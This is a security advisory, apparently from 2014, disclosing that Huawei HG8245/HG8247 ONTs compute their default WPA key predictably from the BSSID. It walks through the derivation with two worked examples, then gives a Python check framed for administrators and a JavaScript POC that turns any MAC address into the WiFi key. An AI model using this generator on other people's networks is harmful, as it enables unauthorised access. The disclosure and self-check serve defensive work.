Huawei HG8245 / HG8247 WPA Generator

Posted on May 22 2014

Summary

Huawei HG8245 and HG8247 ONTs (firmware version V1R006C00S100) rely on a weak algorithm to calculate the default WPA key; the key can be predicted easily from the WiFi MAC address (BSSID).

Description

Model: Huawei HG8245 & HG
Hardware version: 130C4600
Software version: V1R006C00S100

The WPA key is an 8-character string that is calculated through the following method:

1. First we obtain the MAC address of the access point (BSSID) from the SSID.

Example:

MAC = 00:46:4B:D3:CE:5F

A) In order to calculate the first two characters of the WPA key, we use the following formula:

We take the value of the fourth pair of the MAC address:

Example: D3
WPA Key so far: D3

B) In order to calculate the next two characters of the WPA key, we use the following formula:

We take the last pair of chars of the MAC address and check whether it is less than 08 (in hexadecimal):
- If it is, we take the fifth pair of chars of the MAC address and subtract 1 (in hex).
- If it is not, the fifth pair keeps its value.

Example:
Is the last pair, 5F, less than 08?
No, so the fifth pair keeps its value, CE. (If the last pair had been less than 08h, the value would have been CE - 1h = CD.)

WPA Key so far: D3CE
Note: the subtraction wraps around, so 0 - 1 = F.

C) In order to calculate the next character of the WPA key, we use the following formula:

We take the second char of the last pair of the MAC address and check whether it is less than 08h:

- If it is, we take the first char of the last pair of the MAC address and subtract 1h.
- If it is not, the first char of the last pair keeps its value.

Example:
Is F less than 08h?
No, so the value is the first character of the last pair of the MAC address, in this case 5.

WPA Key so far: D3CE5
Note: the subtraction wraps around, so 0 - 1 = F.

D) In order to calculate the next value from the WPA Key, we use the following formula:

Take the second char from the last pair of digits from the MAC Address and switch as follows:

When value is 8 switch to F.
When value is 9 switch to 0.
When value is A switch to 1.
When value is B switch to 2.
When value is C switch to 3.
When value is D switch to 4.
When value is E switch to 5.
When value is F switch to 6.
When value is 0 switch to 7.
When value is 1 switch to 8.
When value is 2 switch to 9.
When value is 3 switch to A.
When value is 4 switch to B.
When value is 5 switch to C.
When value is 6 switch to D.
When value is 7 switch to E.

Example:
If second digit from the last pair of chars from the MAC Address is F, the WPA value will be 6.

WPA Key so far is: D3CE56


E) In order to calculate the last two characters of the WPA key, we use the following formula:

We take the first pair of chars of the MAC address and map it as follows:

When value is 28 switch to 03.
When value is 08 switch to 05.
When value is 80 switch to 06.
When value is E0 switch to 0C.
When value is 00 switch to 0D.
When value is 10 switch to 0E.
When value is CC switch to 12.
When value is D4 switch to 35.
When value is AC switch to 1A.
When value is 20 switch to 1F.
When value is 70 switch to 20.
When value is F8 switch to 21.
When value is 48 switch to 24.

Example:
If first pair of chars from the MAC Address is 00, last two values from the WPA Key will be 0D.
Final WPA Key is: D3CE560D

Second practical example:

MAC:
E0:24:7F:E5:80:01

A) Fourth pair of chars of the MAC: E5
B) Is the last pair of chars of the MAC, 01, less than 08? Yes, so 80 - 1 = 7F
WPA Key so far: E57F
C) Second char of the last pair of the MAC: 1
Is 1 less than 08h? Yes, so 0 - 1 = F.
WPA Key so far: E57FF
D) Second char of the last pair of the MAC: 1
When value is 1 switch to 8.
WPA Key so far: E57FF8
E) First pair of chars of the MAC: E0
When value is E0 switch to 0C.
Final WPA Key: E57FF80C
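The whole derivation, steps A to E, as an added example that is not part of the original advisory or its POC: a Python self-check an administrator can run against an ONT's BSSID and its currently configured key to confirm whether the device still uses the predictable factory key, which is the case that calls for changing it. The function names (parse_mac, default_wpa_key, is_factory_default) and the all-zero and unknown-prefix inputs are this example's own; the two BSSIDs are the advisory's worked examples. Where the page is ambiguous at the boundary value 8 (the text says "less than 08h", the POC below tests <= 8) the example follows the text and marks that as an assumption.

```python
"""Self-check for the predictable HG8245/HG8247 default WPA key (steps A-E above)."""
from typing import List, Optional

# Step E lookup from the advisory: first MAC pair -> last two key characters.
FIRST_PAIR_TABLE = {
    "28": "03", "08": "05", "80": "06", "E0": "0C", "00": "0D", "10": "0E",
    "CC": "12", "D4": "35", "AC": "1A", "20": "1F", "70": "20", "F8": "21",
    "48": "24",
}


def parse_mac(mac: str) -> List[str]:
    """Normalise 'aa:bb:cc:dd:ee:ff', 'aa-bb-...' or 'aabb...' to six upper-case pairs."""
    digits = mac.replace(":", "").replace("-", "").upper()
    if len(digits) != 12 or any(c not in "0123456789ABCDEF" for c in digits):
        raise ValueError("not a MAC address: %r" % mac)
    return [digits[i:i + 2] for i in range(0, 12, 2)]


def default_wpa_key(mac: str) -> Optional[str]:
    """Factory WPA key for this BSSID, or None when the first pair is not in the
    advisory's table (the mapping is only known for those prefixes)."""
    pairs = parse_mac(mac)
    first, fourth, fifth, last = pairs[0], pairs[3], pairs[4], pairs[5]
    if first not in FIRST_PAIR_TABLE:
        return None
    last_val = int(last, 16)
    hi, lo = last_val >> 4, last_val & 0xF

    # A) fourth pair, unchanged
    part_a = fourth
    # B) fifth pair minus 1 (00 wraps to FF) when the whole last pair is below 08h.
    #    Assumption: strict "less than" as in the text; the page's POC also accepts 08.
    part_b = "%02X" % ((int(fifth, 16) - 1) & 0xFF) if last_val < 8 else fifth
    # C) first char of the last pair minus 1 (0 wraps to F) when its second char is below 8
    part_c = "%X" % ((hi - 1) & 0xF) if lo < 8 else "%X" % hi
    # D) second char of the last pair shifted by 7: 8->F, 9->0, ..., 0->7, ..., 7->E
    part_d = "%X" % ((lo + 7) & 0xF)
    # E) first pair through the lookup table
    part_e = FIRST_PAIR_TABLE[first]
    return part_a + part_b + part_c + part_d + part_e


def is_factory_default(mac: str, configured_key: str) -> bool:
    """True when the key configured on the AP equals the predictable default."""
    derived = default_wpa_key(mac)
    return derived is not None and configured_key.strip().upper() == derived


if __name__ == "__main__":
    # Constructed input: the two BSSIDs used in the advisory's worked examples.
    for bssid in ("00:46:4B:D3:CE:5F", "E0:24:7F:E5:80:01"):
        print(bssid, "->", default_wpa_key(bssid))
```

A MAC whose first pair is outside the table returns None rather than a guess, since the advisory only documents the mapping for those thirteen prefixes; the all-zero address exercises both wrap-arounds (00 - 1 = FF in step B, 0 - 1 = F in step C).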

Author: Kaczinski @ [email protected]

POC

// HUAWEI HG8245/HG8247 MAC Address to WPA Key (ROUTERPWN.COM version)
// Step E lookup table: first pair of the MAC -> last two characters of the key.
var LAST_PAIR = {
    "28": "03", "08": "05", "80": "06", "E0": "0C", "00": "0D", "10": "0E", "CC": "12",
    "D4": "35", "AC": "1A", "20": "1F", "70": "20", "F8": "21", "48": "24"
};

// Returns the key for a MAC such as "00:46:4B:D3:CE:5F", or null when the first
// pair is not in the table. The calculation is separated from the prompt()/alert()
// wrapper so it can also be called outside a browser.
function HG824xKey(MACs) {
    var MAC = MACs.toUpperCase().split(":");
    var last = MAC[0], part1 = MAC[3], part2 = MAC[4], partx = MAC[5];
    var extract = partx.split(""), part3 = extract[0], offset = extract[1];
    var integer = parseInt(offset, 16);   // second char (low nibble) of the last pair
    var value = parseInt(part3, 16);      // first char (high nibble) of the last pair

    var part4 = LAST_PAIR[last];
    if (part4 === undefined) {
        return null;
    }
    // Step C: when the second char is below 8, first char minus 1 (0 wraps to F).
    // The original POC tested "integer <= 8" here; the description says "less than 08h".
    var val = part3;
    if (integer < 8) {
        val = ((value + 15) % 16).toString(16).toUpperCase();
    }
    // Step D: second char of the last pair shifted by 7 (8->F, 9->0, ..., 7->E).
    part3 = ((integer + 7) % 16).toString(16).toUpperCase();
    // Step B: when the whole last pair is below 08h, fifth pair minus 1 (00 wraps to FF),
    // always kept as two hex digits.
    if (parseInt(partx, 16) < 8) {
        var new_value = (parseInt(part2, 16) + 255) % 256;
        part2 = ("0" + new_value.toString(16).toUpperCase()).slice(-2);
    }
    return part1 + part2 + val + part3 + part4;
}

function HG824x()
{
    var key = HG824xKey(prompt("MAC:"));
    if (key === null) {
        alert("This MAC is not eligible for getting the WPA key");
        return;
    }
    alert("WPA Key: " + key);
}

